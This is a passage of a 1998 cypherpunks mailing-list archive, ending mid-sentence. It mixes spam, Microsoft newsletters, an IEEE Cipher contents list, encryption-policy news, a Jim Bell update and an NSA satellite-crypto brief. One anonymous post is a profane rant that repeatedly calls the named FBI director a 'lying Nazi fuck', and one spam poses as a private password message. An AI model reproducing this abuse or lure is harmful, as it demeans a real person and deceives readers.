developer tools and strategies: http://www.microsoft.com/msdn/

For the latest and greatest information about Internet technologies,
the Microsoft SiteBuilder Network can be found at:
http://www.microsoft.com/workshop/default.asp

For links to specific developer tools products and technologies, refer to:
Products:  http://www.microsoft.com/msdn/products/
Technologies:  http://www.microsoft.com/msdn/techsite/

TechNet has a new site, ITHome, which offers comprehensive resources for
corporate developers: http://www.microsoft.com/ithome/


Sincerely,
The Microsoft Developer Support team

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft-sponsored events:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For information on all Microsoft-sponsored events, please visit:
http://www.microsoft.com/events/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How to use this mailing list:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You received this e-mail newsletter as a result of your registration on the Microsoft.com Personal Information Center. You may unsubscribe from this e-mail newsletter, or subscribe to a variety of other informative e-mail newsletters, by returning to the Personal Information Center at
http://register.microsoft.com/regwiz/personalinfo.asp
and changing your subscription preferences.

Alternatively, please send a reply to this e-mail with the word "unsubscribe" as the first line in the body of the message.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THIS DOCUMENT IS PROVIDED FOR INFORMATIONAL PURPOSES ONLY.  The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication.  Because Microsoft must respond to change in market conditions, it should not be interpreted to be a commitment on the part of Microsoft and Microsoft cannot guarantee the accuracy of any information presented after the date of publication.
INFORMATION PROVIDED IN THIS DOCUMENT IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND FREEDOM FROM INFRINGEMENT.
The user assumes the entire risk as to the accuracy and the use of this document. This  document may be copied and distributed subject to the following conditions:
1.   All text must be copied without modification and all pages must be included
2.   All copies must contain Microsoft's copyright notice and any other notices provided therein
3.   This document may not be distributed for profit




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Mon, 13 Jul 1998 09:42:12 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 13, 1998
Message-ID: <199807131633.LAA24664@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




<FONT COLOR="#000000"
SIZE=2>=============================================<FONT
COLOR="#000000">
Welcome to today's edition of the CTIA
Daily News
from WOW-COM.  Please click on the
icon / attachment
for the most important news in wireless
communications today.

WIRELESS IT '98, The Next Generation in
Personal
Computing & Communications October
12-14,
Las Vegas, Nevada Call (202) 785-0081 for
more information!
<FONT COLOR="#000000"
SIZE=2>=============================================<FONT
COLOR="#000000">

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael <michael@nudevision.com>
Date: Tue, 14 Jul 1998 00:30:47 -0700 (PDT)
To: webmasterlist@nudevision.com
Subject: FREE XXX VIDEO for your site !!
Message-ID: <18330673314336@nudevision.com>
MIME-Version: 1.0
Content-Type: text/plain



Thats right FREE XXX VIDEO for your website....

- increase traffic
- increase banner sales
- BOOST your profit
- Can be used by FREE SITE and PAY SITES

FREE SITE webmasters go to http://free.nudevision.com

MEMBERSHIP SITE webmasters go to
http://www.nudevision.com/webmasters/index.htm

We are offering PAY SITE website webmasters 90 MINUTE FULL LENGTH MOVIES which
means SALES SALES SALES !!


EARN 10 BUCKS A RAW CLICK AND GET FREE TRAFFIC !! 

"WHAT? Are you guys nuts?"

Well maybe a little..... go to http://www.traffictraders2.com for
more details.

GAY SITE webmasters click here:
http://www.studvision.com/webmasters/index.html

Best Regards,

The Cytron Gang

Cytron Technologies Ltd.
Cytron Communications Ltd.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 13 Jul 1998 08:53:09 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Home/Officeland Defense
Message-ID: <199807131553.LAA07422@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Thanks to DT


http://www.fcw.com/pubs/fcw/1998/0713/fcw-newscyber-7-13-98.html

The Defense Department plans to create a new military organization 
to spearhead DOD's effort to protect the nation's critical computer 
systems against information warfare attacks, marking the first time 
DOD has taken responsibility for protecting infrastructure within
the United States. ...

The Pentagon also is considering the formation of a reserve cadre 
of "cyberdefense warriors," who would have hands-on responsibility 
for protecting the nation's sensitive information networks and 
systems from information warfare attacks. According to an industry 
source familiar with the project, about 300 Ph.D.-carrying 
reservists would work from home computers that would be tied into 
high-speed communications links. DOD has budgeted $10 million to 
jump-start the effort, the source said. ...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sergey Bobok <Sergey.Bobok@p3.f9.n4646.z2.fidonet.org>
Date: Mon, 13 Jul 1998 08:32:37 -0700 (PDT)
To: "cypherpunks%toad.com@fido.alkar.dp.ua>
Subject: <none>
Message-ID: <900340977@p3.f9.n4646.z2.FIDOnet>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "The Birkenstock Store" <list@1800birks4u.com>
Date: Mon, 13 Jul 1998 11:35:41 -0700 (PDT)
To: "Cypherpunks" <cypherpunks@toad.com>
Subject: Birkenstocks on Sale Now!!
Message-ID: <B1CFCBFC.3D150@[192.168.1.135]>
MIME-Version: 1.0
Content-Type: text/plain


Hi

Visit www.BirksonSale.com to learn not only which Birkenstocks are on sale
now, but which are in stock for immediate delivery. Updated daily,
Monday-Friday.

We have just added hundreds of pairs!

Order on line and Save at least 20%!

For example, Save $21.00 today on the Arizona in Sand, Mink and Violet
Suede BirksonSale price $68.95 (Catalog Price $89.95) 

Your order is secure, including encryption of your credit card information,
using the latest in SSL technology.

Log on today and Save!

If you know someone that would also like to save on Birkenstocks forward
this message to them!
____________________________________________________________________________

_

If you would like to be removed from this list email us at
list@1800birks4u.com and include the word  remove  in the subject line.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Avi Rubin <rubin@research.att.com>
Date: Mon, 13 Jul 1998 12:34:37 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cipher: IEEE TC on Security & Privacy Newsletter is online
Message-ID: <199807131932.PAA01744@mgoblue.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Newsgroups: sci.crypt,alt.security,comp.security.misc,alt.security.pgp
Subject: Cipher: IEEE TC on Security & Privacy Newsletter is online
Summary: 
Expires: 
Sender: 
Followup-To: 
Distribution: world
Organization: AT&T Labs, Florham Park, NJ
Keywords: 
Cc: 

Cipher is the electronic newsletter of the IEEE Technical Committee on 
Security & Privacy. We put out a newsletter by e-mail every couple of 
months. There is also a companion web site at:

   http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/

Below is the table of contents of our latest issue. You can find subscription
information on the web site, or just visit back from time to time.




       _/_/_/_/  _/_/_/  _/_/_/_/   _/    _/  _/_/_/_/  _/_/_/_/
      _/          _/    _/     _/  _/    _/  _/        _/     _/
     _/          _/    _/_/_/_/   _/_/_/_/  _/_/      _/_/_/_/
    _/          _/    _/         _/    _/  _/        _/   _/
   _/_/_/_/  _/_/_/  _/         _/    _/  _/_/_/_/  _/     _/

====================================================================
Newsletter of the IEEE Computer Society's TC on Security and Privacy
Electronic Issue 28                                    July 13, 1998
Avi Rubin and Paul Syverson, Editors
                                       Bob Bruen, Book Review Editor
                                        Hilarie Orman, Assoc. Editor
                                     Mary Ellen Zurko, Assoc. Editor
                                      Anish Mathuria, Reader's Guide
====================================================================
         http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/

Contents:                                         [3037 lines total]
 o  Letter from the TC Chair
 o  Letter from the Editor
Security and Privacy News Briefs:
 o LISTWATCH: Items from security-related lists, by Mary Ellen Zurko
 o Microsoft Plans for FIPS 140-1 Compliance
 o Common Criteria Full-use Version 2.0 Completed
 o Purdue CERIAS Opens
 o US Government Announces Comprehensive Privacy Plan
 o Controversial Intellectual Property Law Headed Towards Enactment
 o SKIPJACK and KEA declassified, Biham et al. Announce Cryptanalysis
 o AES Submissions All In
 o DataFellows Reports On Word Macro Virus
 o Industry coalition pushes for new Encryption policy
Commentary and Opinion: Book Reviews by Bob Bruen
 o Virtual Private Network.
   by Charles Scott, Paul Wolfe & Mike Erwin. Reviewed by Robert Bruen
 o Java Security.
   by Gary McGraw and Edward Felten. Reviewed by Robert Bruen
 o Java Security.
   by Scott Oaks. Reviewed by Robert Bruen
 o Java Cryptography.
   by Jonathan Knudsen. Reviewed by Robert Bruen
 o Protecting Networks with Satan.
   by Martin Freiss. Translated by Robert Bach. Reviewed by Robert Bruen
Conference Reports:
 o IEEE Symposium on Security and Privacy (Oakland '98) by Mary Ellen Zurko
 o IEEE Computer Security Foundations Workshop (CSFW11) by Levente Buttyan
 o LICS98 Workshop on Formal Methods and Security Protocols by Scott Stoller
Conference announcements:
 o ACM Conference on Computer and Communications Security
 o ASIACRYPT'98
New reports available via FTP and WWW: several
New Interesting Links on the Web
Who's Where: recent address changes
Calls for Papers: NDSS, DCCA, ASSET, FC, PKC, S&P (Oakland), JCS, DPS
Reader's guide to recent security and privacy literature
 o Conference Papers
 o Journal and Newsletter articles
Calendar
List of Computer Security Academic Positions, maintained by Cynthia Irvine
Publications for Sale -- S&P and CSFW proceedings available
TC officers
Information for Subscribers and Contributors


*********************************************************************
Aviel D. Rubin                                 rubin@research.att.com
Secure Systems Research Dept.                Adjunct Professor at NYU
AT&T Labs - Research
180 Park Avenue                   http://www.research.att.com/~rubin/
Florham Park, NJ 07932-0971                    Voice: +1 973 360-8356
USA                                            FAX:   +1 973 360-8809

   --> Check out http://www.clark.net/pub/mjr/websec/ for a new
       book on web security (The Web Security Sourcebook).
*********************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Support Online Staff" <SupportOnlineStaff_000929@news.newswire.microsoft.com>
Date: Mon, 13 Jul 1998 19:32:30 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <199807140232.TAA09439@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Microsoft Office Support News Watch
===================================

As a subscriber to the Microsoft Office Support News Watch, you receive e-mail twice each month that highlights some of the new articles recently published on Support Online, Microsoft's award-winning technical support web site.

Office
======

For the latest information about Microsoft Office 97 SR-1 see these Knowledge Base articles.

   Q172475   OFF97: How to Obtain and Install MS Office 97 SR-1
   http://support.microsoft.com/support/kb/articles/Q172/4/75.asp

   Q174422   OFF97: Microsoft Office 97 Service Release 1 Patch Update
   http://support.microsoft.com/support/kb/articles/Q174/4/22.asp

   Q150613   OFF97: Microsoft Office 97 Service Release 1 Patch
   http://support.microsoft.com/support/kb/articles/Q150/6/13.asp

   Q173990   OFF97: Troubleshooting the Microsoft Office 97 SR-1 Patch
   http://support.microsoft.com/support/kb/articles/Q173/9/90.asp

   Q156542   OFF97: Microsoft Office 97 Service Release 1 Enterprise Update
   http://support.microsoft.com/support/kb/articles/Q156/5/42.asp

   Q171749   OFF97: How to Determine If SR-1 Is Installed
   http://support.microsoft.com/support/kb/articles/Q171/7/49.asp

   Q172387   OFF97: Files Installed and Updated in MS Office 97 SR-1 Patch
   http://support.microsoft.com/support/kb/articles/Q172/3/87.asp

   Q172476   OFF97: Contents of the Microsoft Office 97 SR-1 Patch Readme
   http://support.microsoft.com/support/kb/articles/Q172/4/76.asp

Net Show and the Microsoft Media Player
=======================================

The Net Show Player has been replaced by the new Microsoft Media Player. The latest Net Show and Microsoft Media Player support information is available at:

   http://support.microsoft.com/support/NetShow/

Download the new media player at:

   http://www.microsoft.com/windows/mediaplayer/

Microsoft Chat
==============

The latest support information for Microsoft Chat, version 2.5 is available at:

   http://support.microsoft.com/support/chat/

Get Support Online Articles by E-mail
=====================================

You can also receive these articles (and others) in e-mail by sending a message to mshelp@microsoft.com. In the Subject line of your message, enter the Article-ID number (Qnnnnnn). For example to receive Q162721, your Subject line should resemble the following example:

   Subject: Q162721

You can have multiple articles sent to you in e-mail by typing multiple Article-ID numbers separated by a comma. For example:

   Subject: Q178049, Q174914, Q174062

To receive an index of articles, enter "Index" (without quotation marks) in the Subject line. For example: 

   Subject: Index

The MSHelp Index is updated monthly. For more information about MSHelp, see http://support.microsoft.com/support/kb/articles/q183/1/21.asp.


Sincerely,
The Support Online team

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Microsoft-sponsored events:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
For information on all Microsoft-sponsored events, please visit:
http://www.microsoft.com/events/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How to use this mailing list:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
You received this e-mail newsletter as a result of your registration on the Microsoft.com Personal Information Center. You may unsubscribe from this e-mail newsletter, or subscribe to a variety of other informative e-mail newsletters, by returning to the Personal Information Center at
http://register.microsoft.com/regwiz/personalinfo.asp
and changing your subscription preferences.

Alternatively, please send a reply to this e-mail with the word "unsubscribe" as the first line in the body of the message.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
THIS DOCUMENT IS PROVIDED FOR INFORMATIONAL PURPOSES ONLY.  The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication.  Because Microsoft must respond to change in market conditions, it should not be interpreted to be a commitment on the part of Microsoft and Microsoft cannot guarantee the accuracy of any information presented after the date of publication.
INFORMATION PROVIDED IN THIS DOCUMENT IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND FREEDOM FROM INFRINGEMENT.
The user assumes the entire risk as to the accuracy and the use of this document. This  document may be copied and distributed subject to the following conditions:
1.   All text must be copied without modification and all pages must be included
2.   All copies must contain Microsoft's copyright notice and any other notices provided therein
3.   This document may not be distributed for profit




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 13 Jul 1998 10:14:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: DirFBI: Danger of Encryption
Message-ID: <199807131715.TAA06057@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sunday, July 12, 1998, in The New York Times, Louis J. Freeh 
had the unmitigated gall of a lying Nazi Fuck to write:

> To the Editor:
> 
> Re "Privacy in the Digital Age" (editorial, July 6): No law 
> enforcement agency is "trying hard to prevent the growing 
> use of encryption." 

In the face of such overwhelming evidence as virtually 
litters the landscape and graces more than one court docket,
how can Louis Fuck-the-Free open with such a bald-faced lie, 
unsupported by any data or argument whatsoever? His own 
agency, not to mention several "non-law-enforcement" agencies 
(is this the lawyer's catch in his assertion?) have been 
lobbying _vigorously_ and without letup for several years
now to "prevent the growing use of encryption." The whole
export control regime for encryption has as its sole purpose
to "prevent the growing use of encryption."

I'm all for a constitutional amendment that would put this 
kind of bald-faced lying by high public officials on the same 
footing as treason, with the same penalties.

> But encryption represents a serious public safety concern. 

It sure does! The lack of widely available, fully functional 
strong crypto is a national and individual weakness that 
allows control freak fucks like Louis to make a reach for 
the ultimate levers of control and cement us into the 
ultimate surveillance state, from which there will be no
return.

> We are open to any solution that recognizes that it is 
> the ability to collect electronic evidence that has 
> allowed us to prevent airliners from being bombed and 
> to put major drug dealers behind bars.

<SNORT!> Right! Like you prevented TWA 800, Lockerbee, and
the ValuJet eaten in midair by illegally transported live 
oxygen canisters? Just HOW MANY AIRLINERS HAVE YOU SAVED,
you lying Nazi fuck?

Don't talk to us about the drug dealers... the ones who 
wouldn't be able to earn a penny if it weren't for the 
War on Drugs in the first place. We already know that the
pharmaceutical market value of a dose of heroin is something
like 25 cents, and that the only reason those addicts are
breaking into our homes and killing us on the streets is
because the GOVERNMENT has made it illegal for them to 
obtain their sleepytime meds at reasonable prices that even
a minimum-wage burger flipper could afford if he wanted to
waste himself that way.

> Key escrow is one possible solution. 

No it isn't. It's not a solution to anything at all. It's 
the destruction of privacy through more heavy-handed tactics 
and intrusion into private affairs. It's the police state's
wet dream, second only to full, real time monitoring of 
everything and everything. One step at a time, though, eh,
lying Nazi fuck?

> There are others, and certainly a statutory scheme can 
> be devised that will all but eliminate any risk of abuse 
> by law enforcement. 

You must be taking some of those drugs your agents seize! If
there is one constant, one unchangeable feature of government
landscape, it is that NO POWER can be safeguarded against 
abuse, and that EVERY POWER will be abused, just some more
than others. This claim is an insult to the intelligence of
even the most retarded, obedient American. Your mother 
clearly didn't wash your mouth with a strong enough brand of
laundry soap to make an impression on your little proto-Nazi
mind.

We should really suspend the ENTIRE debate right now, pending
the prosecution and imprisonment of the thousands of FBI
personnel involved in past, DOCUMENTED violations of rights.
Before we even take you seriously I want to see the asses of
the SAs who have done "black bag jobs", who have killed and 
maimed men, women and children, who have instigated unlawful
acts by incompetents through agents provocateurs, AND their 
SACs, AND their authorizing DDs, etc., ALL LANGUISHING IN 
LEVEL 6 FACILITIES doing the the HARD TIME of multiple life 
terms they so richly deserve for having arrogantly and 
systematically violated their oaths of office and the laws 
of the land. Then and ONLY THEN can we "talk," you strutting, 
lying little Nazi fuck!

> But if we do not allow for court-ordered access, for the 
> first time in the history of this country a court order 
> for seizure of evidence will be an absolute nullity.

Utter Nazi rubbish! The truth is that if you _do_ get what 
you want, for the first time in the history of this country 
it will be unlawful or even impossible for Americans to secure 
their communications as they could in 1789 when the Constitution 
was ratified. It is _not_ the ability to protect communications 
and writings that is new -- it is the invasive technology and 
the windfall to you of communications and records being handled 
by third parties that is new. Your claim of being locked out by 
new technology not contemplated by the Constitution is false. 
What was not contemplated and now needs to be remedied is that 
conversations easily secured against eavesdroppers in 1789 
are now easily overheard, and communications easily secured 
in 1789 are now easily violated. THAT'S what needs to be
fixed, NOT your inability to continue and expand your
totalitarian invasion of the natural rights of Americans
and others.

> We want to work with industry on a real solution, 

More bullshit! You want what you want when you want it and
you have been vigorously campaigning for new and expanded
powers to every ear on Capitol Hill that would listen, even
conducting closed briefings to make your one-sided case out 
of the light of public scrutiny. Admit it -- you're a
thorough-going weasel, and proud of it!

> recognizing that those who acquire encryption over the 
> Internet or from abroad naively make assumptions about 
> the security it affords. 

Oh, PLEASE! You have the security of naive Internet users
at heart? Is that what we're supposed to believe? Do you
really think we just fell off the turnip truck? The very
encryption you fear most, strong public key encryption that
you can't break and won't be able to break within the 
predicted lifetime of the universe, is presently available
over the Internet, AND THAT IS PRECISELY WHAT YOU DON'T LIKE,
you lying Nazi fuck!

> We are not fighting encryption, 

HAVE YOU NO SHAME AT ALL, uttering bald-faced lies like that?

> but we know what will happen if technology cannot be made 
> to work for law enforcement as it works for criminals 
> and terrorists.    

We know, too: freedom will continue to have a chance. You 
need to take a deep breath and consider that many people now
understand the sham in which you are involved. More and more
people are wondering why you don't just nail the truly bad
guys the way they have been nailed for millenia -- by good,
conventional police work. Bad guys have been apprehended since
time immemorial without resort to data-mining the databases and
eavesdropping on all forms of communication. Now, just because
technology allows you means of invasion never contemplated by
the Constitution, suddenly you can't do your job without
them? Utter nonsense! Lying Nazi fuck nonsense!

Louis J. FREEH 
(Louis J. FUCK-THE-FREE)

Dir., Federal Bureau of Investigation
(Generalisimo, Federal Bureau of Absolute Control)

Washington, July 10,1998
(Disneyland-on-the-Potomac)

TruthIsAsPlainAsTheNoseOnYourLyingNaziFuckFaceMonger II





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Power & Prosperity <powergal@polbox.com>
Date: Mon, 13 Jul 1998 19:16:49 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: UCE - I am a real Person sending you a real
Message-ID: <419.435989.92825289powergal@polbox.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm not here on the Internet to burden you with unsolicited advertising 
solicitations. If I've offended you in any way, I am sorry.  If you do not wish to 
receive any more information, then do not respond to this message and you 
won't hear from me again.  I do not re-use email addresses.  After they are 
used ONCE, they are deleted.


My point is brief.  

The reason I am writing to you is that I am overwhelmed with Leads.
I would like to find just a few quality people to work with who have 
the desire to make six-figure results so that I can help them get started.  
I will not sell to anyone, nor will I do any convincing, and neither will you.

If you would like more information, just say the words (words=GPG in the 
subject line of your return email) and I'll email a free, helpful file that will 
give you more information.

Sincerely, 
 
 Dobbin


 PS - Yes, I do read all your responses and I'll handle each one personally.

Note:  To comply with all Federal and State Laws, the following information is 
included. This message is sent by Dobbin Cashman (me) domiciled at 1064 
Bunn Hill Road in Vestal, NY. (800) 350-5426.  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 13 Jul 1998 20:28:03 -0700 (PDT)
To: "Jean-Claude Bouthillier" <dagenais@videotron.ca>
Subject: [humor] Fwd: Win98's README.1ST
Message-ID: <199807140342.XAA12447@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


==================BEGIN FORWARDED MESSAGE==================
>Subject: Win98's README.1ST



Did you intend to upgrade to Win98?
If you do, here's a preview of the READ ME FIRST page


-------------------------------------------------------------------

Congratulations on your purchase of Windows 98 (c),
the latest version of the world's #1 computer operating
system from Microsoft.

A) Before using your new software, please take the time to read these
instructions carefully. Failure to do so may further limit the terms of the
limited warranty. Windows 98 (c) represents a significant
technological improvement over Microsoft's previous operating
system, Windows 95 (c).
You'll notice immediately that
  * "98" is a higher number than "95,"
  * a better than 3 percent increase.
But that's not all. Windows 98 (c) contains many features not found in
Windows 95 (c), or in any competing computer operating system, (if
there are any of course).

Among the improvements: faster storing and
retrieving of files (not in all models), enhanced "Caps Lock" and
back-space functionality, smoother handling, less knocking and
pinging, an easy-to-follow 720-page User's Guide, and rugged
weather-resistant shrink wrap around the box. Most important,
Windows 98 (c) offers superior compatibility with all existing
Microsoft products. We're betting that you'll never use another
company's software again.

Windows 98 (c) comes factory-loaded with the latest version of
Microsoft Explorer, the world's most popular Internet browser. And
despite what you may have heard from the U.S. Department of
Justice, Windows 98 (c) offers you the freedom to select the
Internet browser of your choice, whether it's the one produced by
the world's largest and most trusted software producer, or by a
smaller company that will either go out of business or become part
of the Microsoft family.

Configuring Windows 98 (c) to use a browser OTHER than Microsoft
Explorer is easy. Simply open the "Options" folder, click on the
"time bomb" icon, and select "Load Inferior Browser." A dialog box
will ask "Are you sure?" Click "yes." This question may be asked
several more times in different ways and in 12 different languages
; just keep clicking "yes." Eventually, the time-bomb icon will
enlarge to fill the entire screen, signifying that the browser is
being loaded. You'll know the browser is fully loaded when the fuse
on the time bomb "runs out" and the screen "explodes." If at any
time after installation you become disappointed with the slow speed
and frequent data loss associated with other browsers, simply tap
the space bar on your keyboard. Microsoft Explorer will automatically be
re-installed- permanently.

Windows 98 (c) also corrects, for the first time anywhere, the "Year
2000" computer problem. As you may know, most computers store
the current year as a two-digit number and, as a result, many will
mistake the year 2000 for 1900. Windows 98 (c) solves the
problem by storing the year as a four-digit number and, in theory,
you won't have to upgrade this part of the operating system until the
year 10000.

However, the extra memory required to record the year in four digits
has prompted a few minor changes in the software's internal
calendar. Henceforth, Saturday and Sunday will be stored as single
day, known as "Satsun," and the month of June will be replaced by
two 15-day months called "Bill" and "Melissa." Please also take the
time to complete the online registration form. It only takes a few
minutes and will help us identify the key software problems our
customers want addressed. Be assured that none of the
information you provide, whether it's your Social Security number,
bank records, fingerprints, retina scan or sexual history, will be
shared with any outside company not already designated as a
Microsoft DataShare partner.

We've done our best to make using Windows 98 (c) as trouble-free
as possible. We want to hear from you if you're having any
problems at all with you software. Simply call our toll-free Helpline
and follow the recorded instructions carefully. (The Helpline is open every
day but Satsun, and is closed for the entire month of Bill.)

If we don't hear from you, we'll assume your software is working
perfectly, and an electronic message to that effect will be forwarded
to the Justice Department. We'll also send, in your name, a letter to
the editor of your hometown newspaper, reminding him or her that
American consumers want software designed by companies that
are free to innovate, not by government bureaucrats.

Again, thanks for choosing Windows 98 (c).




===================END FORWARDED MESSAGE===================


Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 14 Jul 1998 05:06:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Jim Bell Request
Message-ID: <199807141206.IAA28181@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


A forwarded message from Jim Bell:

Jim is requesting that cpunks try to get the Oregon 
newspaper to write up another story on his case.

John Branton is the "crime reporter" for the Columbian 
newspaper (editors@columbian.com). Jim asks that people 
send Branton a note saying they would like to see a 
story on the issue of Jim's being spied on.  This reporter 
already knows what the allegations are, but Jim wants
to prod him into covering his story, because he thinks 
it's important enough for the public to know about it.

Jim also would like any reporters on the list who are 
interested in talking to him, to send him their phone 
number and he will give them a call.

BTW, the next hearing date is set for the 7/30/98.  In 
the meantime, he's hanging around shooting pool, reading 
magazines, etc.

[End Jim message]

----------

Jim's address:

    James Bell #26906086
    Federal Detention Center
    P.O. Box 68976
    Seattle WA 98168

----------

Latest court docket entries:


6/30/98  50  MINUTE ORDER by Judge Franklin D. Burgess  that the
             Probation Revocation hrg is rescheduled to 1:30 p.m. on
             7/10/98 for James Dalton Bell (cc: counsel, Judge) (car)
             [Entry date 06/30/98]

7/8/98   --  PROPOSED Supplemental Violations (car) [Entry date 07/08/98]

7/10/98  51  PROBATION PETITION/ORDER by Judge Franklin D. Burgess as to
             James Dalton Bell re: Supplemental Violations  (cc:
             counsel, Judge, USPO) (car) [Entry date 07/10/98]

[END OF DOCKET: 3:97cr5270-0]

----------

Documents on Jim Bell:

   http://jya.com/jdbfiles.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: teezi62@nimbus.rz.uni-konstanz.de (Jorge Boback)
Date: Tue, 14 Jul 1998 15:06:39 -0700 (PDT)
To: teezi62@nimbus.rz.uni-konstanz.de
Subject: Here's the password you wanted....Don't pass it on
Message-ID: <199807143027VAA7354@post.agri.ch>
MIME-Version: 1.0
Content-Type: text/plain


What's up Gary,

Here's the password. 

Don't, I repeat don't give it to anyone

Remember press enter once you get there.

USR:  harry
PWD: balls

CLICK HERE>> http://www.hpic.com/public-bin/redirect.cgi?file=dick&clickline=0&cookie=no_cookie 

Jorge





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Tue, 14 Jul 1998 10:08:41 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 14, 1998
Message-ID: <199807141700.MAA32024@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




<FONT COLOR="#000000"
SIZE=2>=============================================
Welcome to today's edition of the CTIA Daily
News
from WOW-COM.  Please click on the icon /
attachment
for the most important news in wireless
communications today.

WIRELESS IT '98, The Next Generation in
Personal
Computing & Communications October
12-14,
Las Vegas, Nevada Call (202) 785-0081 for more
information!
<FONT COLOR="#000000"
SIZE=2>=============================================

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 14 Jul 1998 14:18:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA on Sat Crypto Device
Message-ID: <199807142118.RAA25583@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


This is a DoD fax of an NSA-brief on the Chinese satellite crypto device.
It was prepared for July 8 testimony by DoD's Franklin Miller before the 
Senate Subcommittee on International Security, Proliferation and Federal 
Affairs. Miller's testimony was cancelled but DoD has provided the one-
page brief to the media upon request.


JUL-14-1998 12:51   DEPARTMENT OF DEFENSE PA       703 697 3501 p.02


                                                          JUL 8 1998


Question: What happened to the encryption device that was aboard the
failed INTELSAT launch in 1996?

Answer: The U.S. personnnel present searched the site for two days after 
the launch failure. Despite extremely hazardous conditions that made 
recovery very difficult, the U.S. personnel believed that they recovered 
all recoverable U.S. parts and components that survived the launch 
failure.

No identifiable parts or components associated with the Telemetry 
Tracking and Control Encryption devices [TT&C], and the circuit board on 
which it was mounted, were recovered. We have been advised by Loral that 
the devices were embedded on a tray mounted within the Command Processor 
Box  of the satellite. lf this is the case, it is highly unlikely that 
the devices survived the crash because of the crash impact and high 
temperatures produced by the burning rocket propellants. According to 
Loral, the Command Processor Box was located adjacent to the propellant 
tanks and U.S. personnel at the site recovered only 30% of the box.

The COMSEC circuit board consisted of a printed wiring board and forty
plus, off-the-shelf and semi-custom discrete small sca]e integrated 
circuit chips. The COMSEC board is somewhat large and relatively fragile 
(about 6x10 inches), with interconnecting "tracks" on the board which 
interconnect the many logic devices into the COMSEC algorithm. As such 
a whole circuit board, its whole composite set of pieces, and the whole 
set of logic chips need to be recovered to succeed in reengineering the 
design of the device. If Loral's assessment of the physical 
implementation of the two COMSEC devices aboard INTELSAT 708 and the 
extent of damage to the command processor from the crash, impact and 
fire are correct, NSA and DTSA believe that it is highly unlikely that 
these items could have been recovered in sufficient detail to reverse 
engineer.

In the unlikely event that the Chinese were able to recover all the 
items fully intact, it is important to note that the encryption board 
involved many embedded devices. Any loss of the chips and associated 
encryption algorithm would have have only minimal impact on national 
